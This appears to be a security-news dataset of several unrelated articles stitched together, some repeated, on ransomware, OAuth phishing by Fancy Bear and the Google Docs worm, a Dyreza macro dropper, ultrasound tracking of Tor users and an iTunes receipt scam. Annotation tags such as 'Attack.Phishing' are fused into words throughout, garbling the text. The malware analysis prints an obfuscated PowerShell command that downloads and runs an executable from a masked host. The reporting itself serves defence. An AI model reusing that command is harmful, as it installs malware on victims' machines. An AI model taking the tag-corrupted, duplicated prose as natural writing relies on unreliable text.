is sentAttack.Phishingthrough a spear-phishing email containing tailored logos and staff names , adding to the deception . Once activated the variant communicates information including operating system , username , country and system code back to its command and control and generates a victim ID , bitcoin wallet ID and bitcoin ransom price . Carl Leonard , principal security analyst at Forcepoint , said : “ While processing our open source intelligence feeds we discovered Philadelphia , currently a cheap , poorly written ransomware that is available cheaply to script kiddies . Although the ransomAttack.Ransomis currently only 0.3 BTC , the command and control paths suggest that the actor is targeting hospitals for this campaign so there are likely to be other targets
The Russian hacking group blamed for targeting U.S. and European elections has been breaking intoAttack.Databreachemail accounts , not only by trickingAttack.Phishingvictims into giving up passwords , but by stealingAttack.Databreachaccess tokens too . It 's sneaky hack that 's particularly worrisome , because it can circumvent Google 's 2-step verification , according to security firm Trend Micro . The group , known as Fancy Bear or Pawn Storm , has been carrying out the attackAttack.Phishingwith its favored tactic of sending outAttack.Phishingphishing emails , Trend Micro said in a report Tuesday . The attackAttack.Phishingworks by sending outAttack.Phishinga fake email , pretending to beAttack.Phishingfrom Google , with the title “ Your account is in danger. ” An example of a phishing email that Fancy Bear has usedAttack.Phishing. The email claims that Google detected several unexpected sign-in attempts into their account . It then suggests users install a security application called “ Google Defender. ” However , the application is actually a ruse . In reality , the hacking group is trying to dupeAttack.Phishingusers into giving up a special access token for their Google account , Trend Micro said . Victims that fall for the scheme will be redirected to an actual Google page , which can authorize the hacking group 's app to view and manage their email . Users that click “ allow ” will be handing over what ’ s known as an OAuth token . Although the OAuth protocol does n't transfer over any password information , it 's designed to grant third-party applications access to internet accounts through the use of special tokens . In the case of Fancy Bear , the hacking group has leveraged the protocol to buildAttack.Phishingfake applications that can foolAttack.Phishingvictims into handing over account access , Trend Micro said . “ After abusing the screening process for OAuth approvals , ( the group ’ s ) rogue application operatesAttack.Phishinglike every other app accepted by the service provider , ” the security firm said . Even Google 's 2-step verification , which is designed to prevent unwarranted account access , ca n't stop the hack , according to Trend Micro . Google 's 2-step verification works by requiring not only a password , but also a special code sent to a user 's smartphone when logging in . Security experts say it 's an effective way to protect your account . However , the phishing schemeAttack.Phishingfrom Fancy Bear manages to sidestep this security measure , by trickingAttack.Phishingusers into granting access through the fake Google security app . Google , however , said it takes many steps to protect users from such phishing attacksAttack.Phishing. `` In addition , Google detects and reviews potential OAuth abuse and takes down thousands of apps for violating our User Data Policy , such as impersonatingAttack.Phishinga Google app , '' the company said in a statement . `` Note that a real Google app should be directly accessed from a Google site or installed from the Google Play or Apple App stores , '' it added . According to Trend Micro , victims were targeted with this phishing attackAttack.Phishingin 2015 , and 2016 . In addition to Google Defender , Fancy Bear has used other apps under names such as Google Email Protection and Google Scanner . They ’ ve also gone after Yahoo users with apps called Delivery Service and McAfee Email protection . The attackAttack.Phishingattempts to trickAttack.Phishingusers into handing over access to their email through fake Google third-party applications . “ Internet users are urged to never accept OAuth token requests from an unknown party or a service they did not ask for , ” Trend Micro said . Although a password reset can sometimes revoke an OAuth token , it 's best to check what third-party applications are connected to your email account . This can be done by looking at an email account 's security settings , and revoking access where necessary . Fancy Bear is most notorious for its suspected role in hacking the Democratic National Committee last year . However , the group has also been found targeting everything from government ministries , media organizations , along with universities and think tanks , according to Trend Micro .
The Russian hacking group blamed for targeting U.S. and European elections has been breaking intoAttack.Databreachemail accounts , not only by trickingAttack.Phishingvictims into giving up passwords , but by stealingAttack.Databreachaccess tokens too . It 's sneaky hack that 's particularly worrisome , because it can circumvent Google 's 2-step verification , according to security firm Trend Micro . The group , known as Fancy Bear or Pawn Storm , has been carrying out the attackAttack.Phishingwith its favored tactic of sending outAttack.Phishingphishing emails , Trend Micro said in a report Tuesday . The attackAttack.Phishingworks by sending outAttack.Phishinga fake email , pretending to beAttack.Phishingfrom Google , with the title “ Your account is in danger. ” An example of a phishing email that Fancy Bear has usedAttack.Phishing. The email claims that Google detected several unexpected sign-in attempts into their account . It then suggests users install a security application called “ Google Defender. ” However , the application is actually a ruse . In reality , the hacking group is trying to dupeAttack.Phishingusers into giving up a special access token for their Google account , Trend Micro said . Victims that fall for the scheme will be redirected to an actual Google page , which can authorize the hacking group 's app to view and manage their email . Users that click “ allow ” will be handing over what ’ s known as an OAuth token . Although the OAuth protocol does n't transfer over any password information , it 's designed to grant third-party applications access to internet accounts through the use of special tokens . In the case of Fancy Bear , the hacking group has leveraged the protocol to buildAttack.Phishingfake applications that can foolAttack.Phishingvictims into handing over account access , Trend Micro said . “ After abusing the screening process for OAuth approvals , ( the group ’ s ) rogue application operatesAttack.Phishinglike every other app accepted by the service provider , ” the security firm said . Even Google 's 2-step verification , which is designed to prevent unwarranted account access , ca n't stop the hack , according to Trend Micro . Google 's 2-step verification works by requiring not only a password , but also a special code sent to a user 's smartphone when logging in . Security experts say it 's an effective way to protect your account . However , the phishing schemeAttack.Phishingfrom Fancy Bear manages to sidestep this security measure , by trickingAttack.Phishingusers into granting access through the fake Google security app . Google , however , said it takes many steps to protect users from such phishing attacksAttack.Phishing. `` In addition , Google detects and reviews potential OAuth abuse and takes down thousands of apps for violating our User Data Policy , such as impersonatingAttack.Phishinga Google app , '' the company said in a statement . `` Note that a real Google app should be directly accessed from a Google site or installed from the Google Play or Apple App stores , '' it added . According to Trend Micro , victims were targeted with this phishing attackAttack.Phishingin 2015 , and 2016 . In addition to Google Defender , Fancy Bear has used other apps under names such as Google Email Protection and Google Scanner . They ’ ve also gone after Yahoo users with apps called Delivery Service and McAfee Email protection . The attackAttack.Phishingattempts to trickAttack.Phishingusers into handing over access to their email through fake Google third-party applications . “ Internet users are urged to never accept OAuth token requests from an unknown party or a service they did not ask for , ” Trend Micro said . Although a password reset can sometimes revoke an OAuth token , it 's best to check what third-party applications are connected to your email account . This can be done by looking at an email account 's security settings , and revoking access where necessary . Fancy Bear is most notorious for its suspected role in hacking the Democratic National Committee last year . However , the group has also been found targeting everything from government ministries , media organizations , along with universities and think tanks , according to Trend Micro .
Google Docs was pulled into a sneaky email phishing attackAttack.Phishingon Tuesday that was designed to trickAttack.Phishingusers into giving up access to their Gmail accounts . The phishing emails , which circulatedAttack.Phishingfor about three hours before Google stopped them , invitedAttack.Phishingthe recipient to open what appeared to beAttack.Phishinga Google Doc . The teaser was a blue box that said , “ Open in Docs. ” In reality , the link led to a dummy app that asked users for permission to access their Gmail account . An example of the phishing email that circulatedAttack.Phishingon Tuesday . Users might easily have been fooledAttack.Phishing, because the dummy app was actually named “ Google Docs. ” It also asked for access to Gmail through Google ’ s actual login service . The hackers were able to pull off the attack by abusing the OAuth protocol , a way for internet accounts at Google , Twitter , Facebook and other services to connect with third-party apps . The OAuth protocol doesn ’ t transfer any password information , but instead uses special access tokens that can open account access . However , OAuth can be dangerous in the wrong hands . The hackers behind Tuesday’s attackAttack.Phishingappear to have builtAttack.Phishingan actual third-party app that leveraged Google processes to gain account access . The dummy app will try to ask for account permission . Last month , Trend Micro said a Russian hacking group known as Fancy Bear was using a similar email attack method that abused the OAuth protocol to phishAttack.Phishingvictims . However , security experts said Tuesday's phishing attackAttack.Phishingprobably was n't from Fancy Bear , a shadowy group that many experts suspect works for the Russian government . `` I do n't believe they are behind this ... because this is way too widespread , '' Jaime Blasco , chief scientist at security provider AlienVault , said in an email . On Tuesday , many users on Twitter , including journalists , posted screen shots of the phishing emails , prompting speculation that the hackers were harvestingAttack.Databreachvictims ' contact lists to target more users . The attackAttack.Phishingwas also sentAttack.Phishingthrough an email address at `` hhhhhhhhhhhhhhhh @ mailinator.com . '' Mailinator , a provider of a free email service , denied any involvement . Fortunately , Google moved quickly to stop the phishing attacksAttack.Phishing, after a user on Reddit posted about them . “ We ’ ve removed the fake pages , pushedVulnerability-related.PatchVulnerabilityupdates through Safe Browsing , and our abuse team is working to prevent this kind of spoofingAttack.Phishingfrom happening again , ” Google said in a statement . Security experts and Google recommend affected users check what third-party apps have permission to access their account and revoke any suspicious access . Users can do so by visiting this address , or performing a Google security check-up . Tuesday's phishing schemeAttack.Phishingwill probably push Google to adopt an even stricter stance on apps that use OAuth , said Robert Graham , CEO of research company Errata Security . However , the internet giant has to strike a balance between ensuring security and fostering a flourishing app ecosystem . `` The more vetting you do , the more you stop innovation , '' Graham said . `` It 's a trade-off . ''
Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaksAttack.Databreachconcerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attackAttack.Phishing, via phishingAttack.Phishing, was highly advanced and combined social engineering tactics with a powerful Trojan . The attackAttack.Phishingis sentAttack.Phishingby email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming fromAttack.Phishinga healthcare company . The text tricksAttack.Phishingthe recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to stealAttack.Databreachcredentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight
Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaksAttack.Databreachconcerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attackAttack.Phishing, via phishingAttack.Phishing, was highly advanced and combined social engineering tactics with a powerful Trojan . The attackAttack.Phishingis sentAttack.Phishingby email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming fromAttack.Phishinga healthcare company . The text tricksAttack.Phishingthe recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to stealAttack.Databreachcredentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight
This attack model was brought to light towards the end of 2016 by a team of six researchers , who presented their findings at the Black Hat Europe 2016 security conference in November and the 33rd Chaos Communication Congress held last week . When the ad plays on a TV or radio , or some ad code runs on a mobile or computer , it emits ultrasounds that get picked up by the microphone of nearby laptops , desktops , tablets or smartphones . Speaking at last week 's 33rd Chaos Communication Congress , Vasilios Mavroudis , one of the six researchers , detailed a deanonymization attackAttack.Databreachon Tor users that leaksAttack.Databreachtheir real IP and a few other details . The attackAttack.Phishingthat the research team put together relies on trickingAttack.Phishinga Tor user into accessing a web page that contains ads that emit ultrasounds or accessing a page that contains hidden JavaScript code that forces the browser to emit the ultrasounds via the HTML5 Audio API . According to Mavroudis , the mobile phone must have an app installed that has embedded one of the many advertising SDKs that include support for uXDT . In tests carried out by Mavroudis , the researcher has interceptedAttack.Databreachsome of the traffic these ultrasound beacons trigger on behalf of the phone , traffic which contains details such as the user 's real IP address , geo-location coordinates , telephone number , Android ID , IMEI code , and device MAC address . According to Mavroudis , there are multiple ways to deliver these attacks other than social-engineering Tor users to access certain URLs , where these ultrasound beacons can be served . Similarly , the attackers could also run a malicious Tor exit node and perform a Man-in-the-Middle attack , forcibly injecting the malicious code that triggers uXDT beacons in all Tor traffic going through that Tor node . A simpler attack method would also be to hide the ultrasounds , which are inaudible to human ears , inside videos or audio files that certain Tor users might be opening . The FBI might be very interested in this method and could deploy it to track viewers of child pornography videos on the Tor network , just like it previously did in Operation Playpen , where it used a Flash exploit .
A new phishing campaignAttack.Phishingis using a fake iTunes receipt for movie purchases to compromise Apple users ' sensitive information . Fortinet researchers first spotted the phishing campaignAttack.Phishingover the weekend of 17 February . The attackAttack.Phishingbegins when an Apple user receivesAttack.Phishinga receipt that appears to have come from iTunes . In actuality , an email address based in Norway sent the message . The receipt lists purchases for a series of movies . These films ( which include `` Allied '' , `` Arrival '' , and `` Jack Reacher : Never Go Back '' ) debuted in theaters recently , which makes the ruse relevant and consequently more believable . This email is n't the first time phishers ( or smishers , for that matter ) have targeted Apple users . Users in the United Kingdom , Australia , and the United States have witnessed similar attacks over the past few years . This particular campaign targets Canadian users and seems to have improved upon earlier iterations of the scam . Of course , most users who receive the receipt will wonder why they 've been charged so much money for something they have n't purchased . Their attention will subsequently go to the link at the bottom of the email that claims they can obtain a full refund . But clicking on the link does n't help them in the slightest . As explained by Fortinet 's researchers : `` At the bottom of the receipt , there ’ s a link to request a “ full refund ” in case of an unauthorized transaction . Apple has no need for a user 's Social insurance number , which Canadians need to work for or to access government services , or their mother 's maiden name . But the phishers want their targets to overlook that fact and enter their details . Indeed , doing so would help the attackers assume control of their victim 's credit card and other financial information . This campaign , like so many others , demonstrates the importance of carefully reviewing suspicious emails . Users should look at the sending email address to see if it 's legitimate . If they come across an invoice or receipt for a credit card purchase , they should check their account history for such a transaction . If they do n't find anything , that means scammers are just trying to scare them into handing over their payment card details . Additionally , users might consider setting up transaction notifications on their payment cards . That way , if they have n't received an alert of a transaction , they 'll immediately know that an invoice such as the one above is a fake